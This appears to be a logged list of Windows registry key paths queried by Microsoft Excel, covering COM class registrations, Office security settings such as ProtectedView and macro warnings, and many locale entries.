HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\(Default)
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\InprocServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\InprocHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\AppID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\LocalServer
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\Elevation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\InProcHandler
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Outlook\Security
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\DisableROForSharedDocs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\SupportUNCMappedDriveSaveAs
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Offline\Options
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Offline\Options\CheckoutToDraftsEnabled
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\Common\Offline\Options
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel\Security\FileBlock
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\FileBlock
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel\Security\FileValidation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\FileValidation
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel\Security\ProtectedView
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableIntranetCheck
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ActiveX Cache
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Security\ProtectedView\Locations
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Security\ProtectedView\Locations
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONES_DEFAULT_DRIVE_INTRANET_KB941000
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONES_DEFAULT_DRIVE_INTRANET_KB941000
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONES_DEFAULT_DRIVE_INTRANET_KB941000
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableInternetFilesInPV
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableAttachmentsInPV
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems\a,k
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\15774E2
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\15774E2\15774E2
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Excel\Text Converters\OOXML Converters\Import
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Excel\Text Converters\OOXML Converters\Export
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\OLE\Tracing
HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\Tracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Ole
HKEY_LOCAL_MACHINE\Software\Microsoft\Ole
HKEY_LOCAL_MACHINE\Software\Microsoft\Ole\DisableStructuredStorageSharedMemoryMode
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\EnableLogUnsupportedFeaturesToAppStorage
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\RevisionTrimSettings
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DefaultSheetR2L
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\A4Letter
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\CursorVisual
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\ControlCharacters
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DefaultFormat
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\VbaOff
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\VbaOff
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\FeatureListForC2RGimme\VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutomaticPictureCompressionDefault
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DiscardImageEdits
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DefaultImageDPI
HKEY_LOCAL_MACHINE\Software\Microsoft\Ole\MaximumAllowedAllocationSize
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\QFE_Saskatchewan
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\QFE_Honshu
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel\Security\Trusted Locations
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations\AllLocationsDisabled
HKEY_CURRENT_USER\Software\Policies\Policies\Microsoft\Office\16.0\Common\Security\Trusted Locations
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Security\Trusted Locations
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations\BlockFQDNFileProtocol
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Documents\DisableNetworkTrustedDocuments
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Security\FileValidation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Security\FileValidation\EnableLogging
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\ExtensionHardening
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Excel\Security\FileBlock\Override
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\FileBlock\OoxmlConverters
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\FileBlock\FileTypeBlockList
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\FileBlock\OoxmlConverterBlockList
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\FileBlock\XL97WorkbooksandTemplates
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\FontSub
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Excel\Security
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\VBAWarnings
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Documents\TrustRecords
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\BlockContentExecutionFromInternet
HKEY_CURRENT_USER\Control Panel\International\User Profile
HKEY_CURRENT_USER\Control Panel\International\User Profile\en-US
HKEY_CURRENT_USER\Control Panel\International\User Profile\en-US\TransientLangId
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\aa-DJ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\aa-DJ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\aa-ER
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\aa-ER
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\aa-ET
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\aa-ET
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\af-NA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\af-NA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\agq
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\agq
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\agq-CM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\agq-CM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ak
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ak
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ak-GH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ak-GH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-001
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-001
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-DJ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-DJ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-ER
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-ER
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-IL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-IL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-KM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-KM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-MR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-MR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-PS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-PS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-SD
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-SD
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-SO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-SO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-SS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-SS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-TD
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-TD
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\asa
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\asa
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\asa-TZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\asa-TZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ast
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ast
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ast-ES
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ast-ES
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\bas
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\bas
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\bas-CM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\bas-CM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\bem
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\bem
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\bem-ZM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\bem-ZM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\bez
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\bez
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\bez-TZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\bez-TZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\bm
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\bm
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\bm-Latn-ML
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\bm-Latn-ML
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\bm-Latn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\bm-Latn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\bo-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\bo-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\brx
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\brx
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\brx-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\brx-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\byn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\byn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\byn-ER
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\byn-ER
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ca-AD
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ca-AD
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ca-FR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ca-FR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ca-IT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ca-IT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ccp
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ccp
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ccp-Cakm-BD
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ccp-Cakm-BD
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ccp-Cakm
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ccp-Cakm
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ccp-Cakm-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ccp-Cakm-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ce
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ce
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ce-RU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ce-RU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ceb
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ceb
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ceb-Latn-PH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ceb-Latn-PH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ceb-Latn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ceb-Latn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\cgg
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\cgg
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\cgg-UG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\cgg-UG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\cu
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\cu
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\cu-RU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\cu-RU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\da-GL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\da-GL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\dav
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\dav
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\dav-KE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\dav-KE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\de-BE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\de-BE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\de-DE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\de-DE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\de-IT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\de-IT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\dje
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\dje
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\dje-NE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\dje-NE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\doi
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\doi
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\doi-Deva-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\doi-Deva-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\doi-Deva
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\doi-Deva
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\dua
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\dua
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\dua-CM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\dua-CM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\dyo
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\dyo
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\dyo-SN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\dyo-SN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ebu
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ebu
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ebu-KE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ebu-KE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ee
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ee
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ee-GH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ee-GH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ee-TG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ee-TG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\el-CY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\el-CY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-001
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-001
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-150
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-150
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-AE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-AE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-AG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-AG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-AI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-AI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-AS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-AS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-AT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-AT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-BB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-BB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-BE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-BE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-BI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-BI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-BM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-BM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-BS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-BS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-BW
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-BW
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-CC
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-CC
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-CH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-CH
